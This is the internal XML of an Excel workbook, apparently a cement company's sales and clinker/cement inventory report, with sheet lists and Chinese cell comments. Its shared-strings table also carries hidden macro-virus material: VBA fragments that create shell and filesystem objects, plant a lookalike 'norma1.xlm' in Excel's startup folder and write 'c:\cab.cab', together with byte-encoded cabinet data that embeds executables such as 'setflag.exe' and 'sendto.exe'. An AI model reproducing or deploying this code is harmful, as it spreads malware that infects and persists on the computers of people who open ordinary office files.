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000" windowHeight="9225" tabRatio="853" firstSheet="22" activeTab="39"/>
  </bookViews>
  <sheets>
    <sheet name="ICLPTOVOVTNRYY" sheetId="500" state="hidden" r:id="rId1"/>
    <sheet name="XXXXXXX" sheetId="501" state="hidden" r:id="rId2"/>
    <sheet name="r" sheetId="539" state="hidden" r:id="rId3"/>
    <sheet name="yc" sheetId="1019" r:id="rId4"/>
    <sheet name="kb" sheetId="716" state="hidden" r:id="rId5"/>
    <sheet name="1" sheetId="717" r:id="rId6"/>
    <sheet name="2" sheetId="1366" r:id="rId7"/>
    <sheet name="3" sheetId="1367" r:id="rId8"/>
    <sheet name="4" sheetId="1368" r:id="rId9"/>
    <sheet name="5" sheetId="1369" r:id="rId10"/>
    <sheet name="6" sheetId="1370" r:id="rId11"/>
    <sheet name="7" sheetId="1371" r:id="rId12"/>
    <sheet name="8" sheetId="1372" r:id="rId13"/>
    <sheet name="9" sheetId="1373" r:id="rId14"/>
    <sheet name="10" sheetId="1374" r:id="rId15"/>
    <sheet name="11" sheetId="1375" r:id="rId16"/>
    <sheet name="12" sheetId="1376" r:id="rId17"/>
    <sheet name="13" sheetId="1377" r:id="rId18"/>
    <sheet name="14" sheetId="1378" r:id="rId19"/>
    <sheet name="15" sheetId="1379" r:id="rId20"/>
    <sheet name="16" sheetId="1380" r:id="rId21"/>
    <sheet name="17" sheetId="1383" r:id="rId22"/>
    <sheet name="18" sheetId="1384" r:id="rId23"/>
    <sheet name="19" sheetId="1385" r:id="rId24"/>
    <sheet name="20" sheetId="1386" r:id="rId25"/>
    <sheet name="21" sheetId="1387" r:id="rId26"/>
    <sheet name="22" sheetId="1388" r:id="rId27"/>
    <sheet name="23" sheetId="1389" r:id="rId28"/>
    <sheet name="24" sheetId="1390" r:id="rId29"/>
    <sheet name="25" sheetId="1391" r:id="rId30"/>
    <sheet name="26" sheetId="1392" r:id="rId31"/>
    <sheet name="27" sheetId="1393" r:id="rId32"/>
    <sheet name="28" sheetId="1400" r:id="rId33"/>
    <sheet name="29" sheetId="1401" r:id="rId34"/>
    <sheet name="30" sheetId="1403" r:id="rId35"/>
    <sheet name="31" sheetId="1409" r:id="rId36"/>
    <sheet name="调整表" sheetId="1410" r:id="rId37"/>
    <sheet name="月报" sheetId="1411" r:id="rId38"/>
    <sheet name="信息表" sheetId="1414" r:id="rId39"/>
    <sheet name="月报信息表新" sheetId="1415" r:id="rId40"/>
    <sheet name="日销售量" sheetId="1247" r:id="rId41"/>
    <sheet name="指标监控" sheetId="1059" r:id="rId42"/>
    <sheet name="熟料库存" sheetId="733" r:id="rId43"/>
    <sheet name="水泥库存" sheetId="734" r:id="rId44"/>
    <sheet name="库存" sheetId="553" r:id="rId45"/>
  </sheets>
  <externalReferences>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年计划量">#REF!</definedName>
    <definedName name="日计划">#REF!</definedName>
    <definedName name="日销售量">日销售量!$1:$1048576</definedName>
    <definedName name="月销售量" localSheetId="38">#REF!</definedName>
    <definedName name="月销售量" localSheetId="39">#REF!</definedName>
    <definedName name="月销售量">#REF!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4.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5.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6.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7.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8.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9.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0.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1.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2.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3.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4.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5.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6.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7.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8.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19.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0.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1.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2.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3.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4.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5.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6.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7.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8.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29.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0.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1.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2.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3.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4.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5.xml><?xml version="1.0" encoding="utf-8"?>
<comments xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <authors>
    <author>admin</author>
  </authors>
  <commentList>
    <comment ref="M13" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="9"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>admin:
5家熟料基地库存</t>
        </r>
      </text>
    </comment>
    <comment ref="N13" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="9"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>admin:
五家熟料基地库容率</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/comments36.xml><?xml version="1.0" encoding="utf-8"?>
<comments xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <authors>
    <author>Administrator</author>
  </authors>
  <commentList>
    <comment ref="T11" authorId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>2个750的水泥散库放熟料.</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/comments37.xml><?xml version="1.0" encoding="utf-8"?>
<comments xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <authors>
    <author>Administrator</author>
  </authors>
  <commentList>
    <comment ref="R11" authorId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>2个750的水泥散库放熟料.</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="8800" uniqueCount="438">
  <si>
    <t xml:space="preserve">77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0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</si>
  <si>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Private Sub createcabfile()</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 32 0 110 111 114 109 97 108 46 100 111 116 0 0 80 0 0 0 144 3 0 0 0 229 48 54 95 32 0 115 101 110 100 116 111 46 101 120 101 0 93 3 165 99 72 50 0 128 67 75 236 58 109 116 20 85 150 85 93 213 73 37 169 166 11 236 196 0 65 90 44 92 152 48 28 156 14 14 216 129 105 52 221 9 199 4 58 132 116 19 49 9 40 196 216 43 200 36 85 160 78 26 59 84 218 77 229 209 154 221 163 206 236 142 103 143 46 58 198 115 156 213 61 58 51 56 199 29 187 19 76 2 202 71 24 151 201 12 179 10 234 226 203 20 106 28 178 157 206 208 80 123 95 85 135 4 231 99 119 127 204 191 188 115 94 223 170 247 238 123 239 222 251 238 103 37 85 247 116 83 12 69 81 44 116 93 167 168 195 148 217 60 212 255 222 6 161 207 90 248 243 89 212 155 57 199 111 62 76 87 30 191 121 115 243 131 173 206 61 45 15 63 208 178 125 151 243 254 237 187 119 63 44 57 239 219 233 108 145 119 59 31 220 237 44 219 88 227 220 245 240 142 157 203 109 182 92 49 179 199 227 53 76 212 253 173 93 103 38 251 47 191 249 192 153 60 128 135 151 223 127 230 91 198 216 67 103 110 4 88 247 205 253 103 86 25 243 77 103 214 2 220 244 224 253 205 4 127 146 22 191 151 162 42 105 134 154 255 220 39 215 72 63 71 217 233 60 58 11 38 225 101 133 57 22 190 17 126 4 232 219 50 92 10 230 59 155 89 51 9 169 238 12 30 52 198 248 21 50 239 194 181 113 97 154 44 </t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179 199 67 85 171 146 184 172 191 76 156 47 96 31 212 139 8 135 232 208 178 90 252 36 148 210 181 33 58 182 89 92 17 162 55 225 239 91 97 170 76 92 181 88 135 125 18 231 44 126 188 15 70 2 40 21 170 172 85 219 68 9 55 0 126 0 223 7 131 106 135 216 65 25 216 149 202 145 85 29 241 189 34 250 8 118 10 177 53 184 218 220 69 84 142 8 104 208 215 126 158 108 166 244 177 238 175 218 62 116 157 237 136 171 247 138 69 246 39 158 130 65 216 210 137 54 139 206 16 133 44 158 196 185 28 127 45 190 66 214 74 226 150 24 162 44 148 65 117 41 190 4 21 60 122 15 165 208 144 90 38 222 155 24 177 92 122 137 48 136 142 41 231 25 255 165 23 241 32 153 175 20 183 193 241 205 100 85 204 145 183 9 191 111 14 150 1 166 71 73 176 202 17 81 173 132 211 42 69 135 199 164 168 189 143 224 186 19 176 103 145 253 160 172 235 122 136 10 173 168 197 223 179 78 138 164 44 196 110 194 29 172 201 100 8 228 145 99 29 131 37 64 101 48 131 83 41 86 132 216 106 188 141 224 108 22 253 100 168 76 148 66 172 95 125 218 144 14 246 153 84 180 41 71 42 80 226 31 219 63 214 105 138 98 122 81 42 161 231 0 21 52 21 1 17 44 123 148 91 223 126 148 186 170 235 235 36 107 57 25 64 227 137 11 57 1 114 99 120 156 49 54 40 10 81 235 208 112 226 124 78 117 45 254 13 236 9 162 141 234 251 75 209 165 73 158 3 248 44 99 16 177 4 136 189 23 4 202 118 3 99 203 50 82 125 217 88 82 212 222 79 80 55 202 199 64 194 75 92 113 247 40 225 29 186 211 254 228 5 160 182 9 </t>
  </si>
  <si>
    <t xml:space="preserve">241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 176 178 50 86 242 172 178 246 138 68 223 229 30 150 184 59 149 126 214 253 171 182 47 204 75 66 142 238 59 1 159 25 218 84 139 255 141 49 111 169 76 252 155 16 237 199 223 167 13 33 192 81 149 213 248 105 139 33 173 178 77 184 11 158 106 241 46 138 252 206 166 12 209 186 226 141 13 245 91 149 35 37 125 221 208 2 112 36 23 84 78 234 200 199 247 120 36 171 50 168 107 119 244 40 82 73 0 183 80 134 117 96 1 204 66 223 43 224 90 43 89 207 71 227 97 43 224 107 115 144 175 40 26 151 242 252 216 70 38 154 138 168 58 52 160 52 241 84 99 67 159 177 107 52 41 231 4 240 223 195 46 117 48 130 111 129 135 104 188 206 56 162 161 47 233 179 121 36 59 217 246 183 176 122 124 184 174 97 126 188 207 21 111 232 171 33 107 121 215 217 32 16 132 6 193 8 34 19 22 249 219 77 175 112 180 116 27 242 113 104 109 113 10 148 227 214 160 159 172 29 55 73 114 15 200 179 8 253 17 105 150 120 69 245 241 90 182 178 129 119 42 239 1 83 156 210 196 82 106 86 35 234 107 216 218 23 162 177 133 144 3 135 128 235 112 157 117 233 171 87 198 145 135 218 95 245 194 225 239 121 64 173 94 7 134 86 161 10 62 153 80 164 21 74 155 40 208 178 221 143 151 131 249 40 41 189 78 90 112 151 54 143 140 82 242 13 201 132 69 154 229 199 55 100 166 100 75 94 202 231 54 54 107 123 195 88 136 250 36 11 26 104 132 83 107 209 197 106 56 16 133 121 251 107 97 1 121 57 53 156 142 234 170 151 67 31 201 217 174 248 200 113 226 105 100 71 211 184 143 231 105 137 67 190 66 213 235 </t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t xml:space="preserve">208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150 2 185 1 251 47 40 63 254 61 104 65 157 33 133 229 186 151 16 121 55 80 25 141 63 78 232 164 201 213 158 181 71 253 32 13 228 21 128 233 163 125 228 6 144 55 13 167 12 20 27 135 242 218 103 186 36 178 248 35 11 185 129 16 13 47 28 102 243 224 165 238 235 34 170 231 208 73 144 80 56 173 86 113 134 136 94 249 147 34 226 51 34 210 24 84 197 101 230 190 97 10 233 22 247 32 154 48 133 116 123 13 14 66 80 88 26 230 38 165 196 124 68 88 187 219 93 229 104 89 78 196 130 18 82 142 41 150 68 113 175 191 134 8 228 229 188 140 174 75 183 19 161 124 123 169 151 99 134 181 194 0 254 73 46 76 16 41 44 233 100 128 140 187 244 42 14 72 81 194 28 101 143 238 189 158 125 65 99 13 33 12 184 78 23 123 57 34 128 255 50 173 141 168 170 34 61 12 46 193 17 213 165 92 69 167 193 40 116 139 92 47 126 9 207 160 191 178 45 128 127 54 139 162 232 50 209 81 231 210 3 248 179 180 78 12 180 14 52 60 91 76 19 13 119 244 208 146 208 195 73 124 242 8 43 103 15 248 10 137 243 11 130 76 29 132 252 115 54 131 124 215 81 32 213 254 76 98 61 74 104 182 1 107 247 94 15 85 64 156 192 160 14 54 138 23 204 38 6 41 211 125 126 88 38 76 118 252 172 221 112 19 125 33 15 188 242 164 227 33 162 229 71 120 114 77 33 189 249 245 109 30 170 57 114 155 135 218 241 130 241 37 123 135 186 216 140 204 2 92 161 186 19 235 249 44 96 184 78 119 125 160 230 247 192 145 104 208 140 73 170 237 69 120 75 156 231 152 99 170 237 121 242 136 133 67 207 1 12 81 120 79 </t>
  </si>
  <si>
    <t xml:space="preserve">33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105 30 69 53 19 226 245 252 50 112 243 128 63 133 116 116 18 105 2 30 234 50 88 28 16 59 233 254 36 49 128 119 207 55 24 11 72 185 126 28 35 207 224 11 67 64 95 228 49 160 50 159 7 108 112 121 181 160 250 160 12 238 53 207 131 23 178 43 79 16 109 31 128 56 153 178 42 23 22 198 138 162 207 3 114 226 2 131 152 100 217 10 150 150 30 12 98 251 226 140 26 150 94 211 158 130 144 5 167 68 138 10 209 8 227 47 225 161 206 253 110 157 84 20 196 159 144 103 191 158 239 128 195 64 196 185 122 190 0 79 8 107 22 215 231 65 124 55 204 34 166 46 178 99 5 75 69 63 151 114 106 113 255 34 192 215 242 93 113 205 161 44 126 26 152 165 76 213 201 153 84 157 250 173 38 135 166 30 47 0 45 156 171 239 229 112 22 104 73 83 123 19 63 126 217 21 175 83 179 84 31 167 250 216 134 62 8 93 172 219 74 56 107 93 131 6 33 224 77 88 149 143 23 34 62 70 184 74 150 13 1 67 139 253 120 109 134 200 66 147 72 206 36 18 72 140 131 13 206 57 68 200 184 142 10 162 139 237 23 29 36 3 169 226 106 220 54 178 127 32 104 87 30 5 95 132 18 232 171 63 150 93 23 200 174 135 182 119 4 1 3 28 127 88 80 195 41 53 60 106 248 23 50 214 227 148 248 144 37 88 141 15 229 26 198 131 24 166 63 233 97 35 246 142 4 185 15 47 79 150 120 211 106 152 179 63 241 25 140 196 162 23 47 131 85 86 165 139 171 120 119 149 208 186 20 30 117 111 186 43 39 50 145 43 103 235 222 209 126 202 230 233 228 60 104 48 246 12 193 44 62 214 62 65 254 92 211 246 62 </t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 131 4 34 171 230 217 59 142 67 68 49 207 42 34 70 189 134 28 166 21 20 123 71 255 156 186 128 55 124 129 4 198 64 8 226 69 131 156 125 152 184 42 45 203 221 31 206 70 253 135 200 12 228 148 248 49 162 117 135 72 24 38 225 234 230 16 27 80 141 112 138 183 95 55 193 133 230 225 205 224 13 235 92 71 15 251 193 34 81 62 153 81 217 217 74 220 9 153 240 154 83 45 16 129 127 231 58 253 214 54 50 217 139 126 111 42 2 98 13 69 64 236 40 113 231 16 33 100 70 201 209 149 132 243 206 246 137 56 96 182 125 0 14 241 63 193 93 68 214 156 34 44 72 214 145 38 56 151 104 25 36 36 50 79 146 145 6 161 231 128 189 227 18 176 213 227 177 71 53 2 33 253 35 249 69 143 96 239 56 75 148 100 3 39 94 85 103 129 127 6 124 50 161 236 228 41 241 75 222 210 244 10 111 248 245 69 237 87 247 192 105 18 215 126 181 27 160 156 87 131 127 184 200 72 139 228 236 0 174 36 156 146 56 198 209 65 105 71 38 217 137 85 208 234 44 180 161 112 61 4 196 13 236 126 33 232 175 193 212 149 140 95 227 53 151 114 89 151 10 80 31 122 143 48 122 126 146 209 24 59 168 89 15 111 105 5 11 243 176 78 201 22 178 132 168 26 124 52 219 212 108 31 215 85 197 117 114 154 3 242 71 47 215 72 182 252 113 122 114 203 213 97 190 81 202 34 145 75 179 67 244 55 170 37 141 227 157 64 63 201 220 182 214 247 189 63 173 129 128 130 134 128 170 4 20 230 192 242 134 152 126 247 213 189 156 59 101 63 240 8 88 213 248 0 249 107 164 236 128 194 70 249 152 81 38 184 150 </t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t xml:space="preserve">165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 139 208 159 131 254 52 244 131 132 254 178 39 63 85 203 158 250 20 32 6 136 1 94 4 120 17 32 20 31 79 141 2 28 3 56 6 48 5 48 5 48 13 48 29 99 99 198 159 105 71 153 212 164 36 116 194 240 40 244 52 116 97 33 140 120 185 134 198 163 125 221 132 186 233 207 38 231 153 17 160 241 58 105 128 40 38 113 99 210 109 233 88 219 234 116 70 254 226 148 252 109 87 46 189 148 134 115 247 56 201 185 227 191 6 41 59 157 6 191 147 247 49 97 222 71 49 185 143 71 22 26 247 65 144 187 59 225 185 7 250 41 232 93 62 230 150 161 206 114 102 3 108 188 145 108 251 211 105 219 18 186 50 243 83 119 244 133 69 249 210 144 254 193 105 152 221 211 240 0 105 234 174 190 96 148 47 9 185 246 3 247 64 88 185 126 111 17 192 50 232 37 208 75 161 151 65 175 132 190 25 250 3 78 227 94 160 240 123 170 8 96 33 192 66 128 14 128 14 128 2 64 1 32 15 144 7 200 1 228 0 178 0 217 235 239 197 148 79 4 126 59 161 255 0 250 171 206 105 247 226 99 128 234 105 247 96 188 95 127 7 211 199 174 187 55 125 229 197 125 30 202 72 128 137 192 73 86 209 38 178 231 246 45 50 210 137 34 179 80 146 11 86 151 137 156 36 24 99 63 188 201 28 251 208 21 55 99 175 123 37 39 121 168 125 144 225 223 87 96 78 21 65 189 197 132 232 6 165 223 174 92 24 13 76 37 25 78 35 201 152 138 216 246 142 35 25 31 246 54 129 22 41 215 48 238 145 127 133 55 158 158 116 85 80 186 189 189 128 68 0 43 184 11 53 75 223 91 8 49 158 228 150 7 141 50 146 87 141 60 251 33 </t>
  </si>
  <si>
    <t xml:space="preserve">226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1 253 224 247 193 41 66 240 207 164 1 25 223 200 244 119 249 217 100 47 164 2 255 76 138 230 157 41 10 234 14 37 44 80 232 164 244 64 178 215 34 223 151 236 173 144 22 116 121 172 165 185 82 129 94 37 128 5 50 177 141 244 128 55 69 10 157 254 178 21 214 92 51 112 67 192 150 133 106 35 104 139 102 222 114 135 25 68 67 214 58 119 66 206 159 10 132 170 205 136 201 107 201 129 169 93 70 206 177 18 158 253 184 142 228 142 35 183 18 122 25 84 59 70 215 166 98 149 43 88 35 87 129 204 35 69 84 225 180 148 19 249 78 174 204 242 172 102 17 47 119 130 18 129 183 77 169 94 129 25 116 39 212 170 148 93 121 207 72 80 132 46 170 20 226 51 185 198 82 155 148 215 153 93 174 123 133 17 82 127 175 95 13 249 73 33 96 120 34 171 114 229 44 197 43 88 180 134 254 108 91 57 108 162 181 154 188 0 110 204 171 135 232 201 44 68 188 46 91 132 167 114 37 60 70 73 235 204 124 160 66 186 161 203 171 131 124 110 132 109 80 94 121 103 217 109 86 109 169 59 204 203 121 145 176 158 43 91 251 179 115 181 194 16 29 210 73 42 81 109 124 156 224 201 140 196 146 115 129 126 32 201 126 160 28 108 91 19 64 186 18 240 156 213 227 1 38 45 157 89 197 97 30 114 51 200 115 254 82 70 241 166 145 16 72 22 253 84 179 3 66 105 51 7 63 248 4 96 52 179 228 149 34 175 239 80 153 82 6 74 12 163 144 201 55 117 151 12 208 198 0 155 25 8 134 232 198 213 107 134 225 16 121 54 177 75 61 127 217 54 82 77 228 47 1 0 198 201 83 53 232 94 209 161 174 249 0 80 </t>
  </si>
  <si>
    <t xml:space="preserve">58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 240 227 15 11 205 130 65 230 167 100 169 109 132 243 10 13 209 20 1 171 43 72 85 48 12 249 196 215 178 239 28 63 126 163 128 120 2 39 202 38 101 194 149 24 40 0 234 251 179 151 115 205 34 161 158 231 92 103 209 62 97 117 35 171 202 99 97 70 109 100 67 116 77 0 175 51 235 73 119 31 228 211 109 91 81 144 111 26 239 229 104 153 43 46 103 71 230 16 83 200 70 27 57 52 92 252 235 100 47 163 214 167 164 165 232 12 250 48 241 7 171 242 201 66 228 120 198 172 27 126 195 70 164 37 104 200 125 170 117 81 228 142 92 153 209 189 169 59 181 175 146 189 17 121 206 117 149 238 8 201 222 149 112 154 146 57 208 168 145 55 224 45 89 206 131 241 147 226 21 5 217 232 105 153 187 185 54 53 242 15 240 90 156 96 122 201 119 153 254 63 85 121 101 193 129 33 146 71 233 242 24 126 252 170 201 129 55 45 47 64 229 28 212 32 196 24 91 243 136 125 1 41 156 7 72 41 183 57 181 18 130 158 38 43 170 96 133 145 249 194 50 200 215 247 217 208 70 195 223 89 193 223 73 12 42 47 36 7 27 199 192 43 249 194 226 229 150 122 211 64 50 148 21 76 194 208 121 242 149 164 26 28 221 202 49 136 30 228 99 137 235 44 72 71 173 79 119 101 151 110 151 230 149 182 72 246 210 125 246 232 34 144 224 91 52 4 22 141 124 0 56 65 107 220 91 57 196 0 79 88 66 244 61 93 229 116 249 29 125 246 142 79 128 93 247 47 205 180 213 254 139 184 146 218 252 120 139 180 77 193 197 146 87 193 115 165 219 21 60 75 42 170 176 71 95 37 101 70 125 218 30 61 4 15 3 222 52 241 128 202 81 </t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t xml:space="preserve">167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 122 100 46 60 71 142 71 70 102 3 108 126 17 144 12 39 13 110 232 187 55 194 141 15 130 67 112 191 23 102 161 188 157 135 188 14 221 122 16 116 69 221 195 171 91 88 181 80 221 194 169 91 138 212 10 243 27 14 202 39 5 8 84 231 174 207 93 73 87 220 253 31 193 253 245 104 129 241 165 240 50 178 187 143 75 249 201 117 188 34 229 122 148 1 214 221 219 118 81 251 14 42 81 52 17 165 66 206 196 103 22 92 144 130 50 5 217 204 250 196 110 126 97 44 205 118 95 145 10 209 184 251 191 129 223 13 130 174 238 102 213 221 188 186 155 83 151 171 187 139 80 191 81 92 147 162 131 208 75 34 4 68 118 123 135 147 216 196 22 46 122 214 222 145 79 110 242 178 85 230 149 109 28 56 177 45 35 54 99 0 244 57 73 244 217 246 91 194 77 21 40 36 175 26 207 168 130 37 89 84 116 208 152 173 104 37 21 83 37 252 50 67 1 247 177 112 126 172 100 125 241 80 172 228 39 195 80 54 41 183 82 202 255 180 247 53 80 81 92 89 194 213 116 129 5 52 118 43 16 209 104 210 70 204 196 33 49 196 246 7 166 197 116 11 173 128 160 141 45 221 33 138 74 164 13 116 16 152 166 74 193 129 164 73 193 124 20 149 90 157 196 179 155 61 51 155 9 209 153 117 146 239 59 155 179 153 207 207 153 100 147 198 206 128 154 108 98 116 39 58 154 47 226 140 187 83 78 185 9 70 3 173 33 212 119 239 171 106 108 147 56 51 187 103 206 126 231 236 225 157 243 120 127 247 189 119 223 223 125 247 222 119 139 30 48 149 114 163 34 37 46 217 0 48 5 176 188 97 36 24 152 224 113 1 155 11 246 198 101 117 98 </t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t xml:space="preserve">86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 89 50 73 152 11 39 24 178 88 32 123 17 143 237 92 254 156 131 132 182 114 137 242 124 224 132 196 37 168 121 178 169 189 73 223 137 176 211 151 23 176 134 213 94 249 159 81 111 37 177 73 6 69 150 232 127 194 219 196 45 223 53 162 170 226 112 149 253 170 176 4 245 82 32 178 38 203 125 255 142 123 161 0 91 200 187 155 205 175 244 201 207 101 225 67 85 149 43 244 112 1 123 79 165 124 233 115 85 181 71 170 132 36 2 30 68 112 159 186 84 70 243 207 42 32 248 85 198 47 243 238 230 142 85 171 4 9 249 135 88 46 204 193 184 112 215 150 205 131 137 7 0 83 60 14 27 117 34 113 11 246 143 3 71 249 230 16 192 214 209 0 227 245 168 153 121 48 79 125 168 82 19 150 28 197 77 50 158 151 197 38 136 81 201 21 117 75 174 49 183 199 227 147 203 9 79 129 212 71 162 123 220 114 201 231 56 40 254 237 44 251 85 192 144 145 79 92 6 12 98 240 162 11 128 190 239 246 250 228 25 164 214 24 255 118 70 177 64 52 113 91 54 239 71 85 156 70 189 196 114 96 66 50 60 94 126 46 37 114 22 164 96 131 4 107 88 200 110 149 101 132 101 112 144 132 14 83 40 239 30 174 168 215 109 112 132 110 220 195 46 232 58 201 206 55 31 58 57 242 116 77 155 131 162 89 147 106 232 30 97 147 122 45 61 119 172 114 144 248 175 73 92 121 143 36 232 208 189 212 42 108 96 149 67 41 36 57 137 164 184 215 226 48 31 58 59 194 199 55 146 216 155 213 115 215 42 232 197 202 38 119 33 151 117 35 153 123 183 235 36 103 44 86 24 210 212 118 21 216 195 44 42 148 71 153 187 134 0 207 </t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
